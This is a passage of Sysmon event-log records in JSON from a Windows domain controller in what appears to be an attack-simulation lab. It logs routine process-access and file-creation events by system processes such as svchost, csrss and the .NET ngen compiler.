4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7595,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7596,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7597,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010860E0C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010860E0C00}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7598,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:46.491\r\nProcessGuid: {41C8662E-2259-5F25-0000-00104CF10D00}\r\nProcessId: 4232\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1088-0\\PresentationUI.dll\r\nCreationUtcTime: 2020-08-01 08:05:46.476","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:46.491","ProcessGuid":"{41C8662E-2259-5F25-0000-00104CF10D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1088-0\\PresentationUI.dll","CreationUtcTime":"2020-08-01 08:05:46.476","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7599,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:46.538\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010B8620B00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:46.538","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010B8620B00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7600,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:46.538\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010B8620B00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:46.538","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010B8620B00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7601,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:46.538\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010B8620B00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:46.538","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010B8620B00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7602,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:46.647\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-225A-5F25-0000-0010B4FC0D00}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:46.647","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-225A-5F25-0000-0010B4FC0D00}","TargetProcessId":"4348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7603,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:46.647\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-225A-5F25-0000-0010B4FC0D00}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:46.647","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-225A-5F25-0000-0010B4FC0D00}","TargetProcessId":"4348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
